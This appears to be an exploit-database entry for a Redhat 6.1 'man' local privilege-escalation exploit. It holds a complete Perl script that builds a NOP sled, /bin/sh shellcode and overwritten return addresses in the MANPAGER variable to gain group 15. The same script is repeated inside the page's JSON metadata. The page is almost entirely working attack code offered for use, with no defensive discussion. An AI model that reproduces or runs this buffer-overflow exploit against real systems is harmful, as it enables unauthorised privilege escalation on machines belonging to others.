Search...

Redhat 6.1 man Local Exploit (egid 15)

2001-01-19T00:00:00

ID 1337DAY-ID-7279
Type zdt
Reporter teleh0r
Modified 2001-01-19T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            ======================================
Redhat 6.1 man Local Exploit (egid 15)
======================================


#!/usr/bin/perl

##  Redhat 6.1 man exploit - gives egid 15
##  Written just for fun - [email protected]


$shellcode =  "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
              "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
              "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
              "\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";


$len = 4062;        # -- Sufficient to overwrite EIP.
$nop = "\x90";      # -- x86 NOP.
$ret = 0xbfffbb24;  # -- ESP / Return value.
$offset = -800;     # -- Default offset to try.


if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i &lt; ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

# [ Buffer: NNNNNNNNNNNNNN ]

# Add the shellcode to the buffer.

$buffer .= $shellcode;

# [ Buffer: NNNNNNNNNNNNNNSSSSS ]

$address = sprintf('%lx', ($ret + $offset));
$new_ret = pack('l', ($ret + $offset));

print("Address: 0x$address / Offset: $offset\n");
sleep(1);

# Fill the rest of the buffer (length 100) with RET's.

for ($i += length($shellcode); $i &lt; $len; $i += 4) {
    $buffer .= $new_ret;
}

# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]

local($ENV{'MANPAGER'}) = $buffer; exec("/usr/bin/man id");



#  0day.today [2018-03-28]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-7279", "lastseen": "2018-03-28T03:24:06", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2018-03-28T03:24:06", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:D204CF95BB6241F12DBF7CA7342E934C"]}, {"type": "ics", "idList": ["ICSA-19-157-01"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810237", "OPENVAS:1361412562310809833", "OPENVAS:1361412562310813650", "OPENVAS:1361412562310813651"]}, {"type": "cve", "idList": ["CVE-2014-7279"]}, {"type": "mskb", "idList": ["KB3204059", "KB3204062"]}, {"type": "nessus", "idList": ["SMB_NT_MS16-144.NASL", "SMB_NT_MS16-145.NASL"]}, {"type": "kaspersky", "idList": ["KLA10921", "KLA10920", "KLA10924"]}, {"type": "metasploit", "idList": ["MSF:POST/WINDOWS/GATHER/CREDENTIALS/HEIDISQL"]}, {"type": "seebug", "idList": ["SSV:87332"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128911"]}, {"type": "zdt", "idList": ["1337DAY-ID-22808"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9C97E11B989D76D23BA59867D555D277"]}], "modified": "2018-03-28T03:24:06", "rev": 2}, "vulnersScore": 5.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7279", "description": "Exploit for linux platform in category local exploits", "title": "Redhat 6.1 man Local Exploit (egid 15)", "cvelist": [], "sourceData": "======================================\r\nRedhat 6.1 man Local Exploit (egid 15)\r\n======================================\r\n\r\n\r\n#!/usr/bin/perl\r\n\r\n## Redhat 6.1 man exploit - gives egid 15\r\n## Written just for fun - [email\u00a0protected]\r\n\r\n\r\n$shellcode = \"\\xeb\\x1f\\x5f\\x89\\xfc\\x66\\xf7\\xd4\\x31\\xc0\\x8a\\x07\".\r\n \"\\x47\\x57\\xae\\x75\\xfd\\x88\\x67\\xff\\x48\\x75\\xf6\\x5b\".\r\n \"\\x53\\x50\\x5a\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\xe8\\xdc\\xff\".\r\n \"\\xff\\xff\\x01\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x01\";\r\n\r\n\r\n$len = 4062; # -- Sufficient to overwrite EIP.\r\n$nop = \"\\x90\"; # -- x86 NOP.\r\n$ret = 0xbfffbb24; # -- ESP / Return value.\r\n$offset = -800; # -- Default offset to try.\r\n\r\n\r\nif (@ARGV == 1) {\r\n $offset = $ARGV[0];\r\n}\r\n\r\nfor ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {\r\n $buffer .= $nop;\r\n}\r\n\r\n# [ Buffer: NNNNNNNNNNNNNN ]\r\n\r\n# Add the shellcode to the buffer.\r\n\r\n$buffer .= $shellcode;\r\n\r\n# [ Buffer: NNNNNNNNNNNNNNSSSSS ]\r\n\r\n$address = sprintf('%lx', ($ret + $offset));\r\n$new_ret = pack('l', ($ret + $offset));\r\n\r\nprint(\"Address: 0x$address / Offset: $offset\\n\");\r\nsleep(1);\r\n\r\n# Fill the rest of the buffer (length 100) with RET's.\r\n\r\nfor ($i += length($shellcode); $i < $len; $i += 4) {\r\n $buffer .= $new_ret;\r\n}\r\n\r\n# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]\r\n\r\nlocal($ENV{'MANPAGER'}) = $buffer; exec(\"/usr/bin/man id\");\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "published": "2001-01-19T00:00:00", "references": [], "reporter": "teleh0r", "modified": "2001-01-19T00:00:00", "href": "https://0day.today/exploit/description/7279"}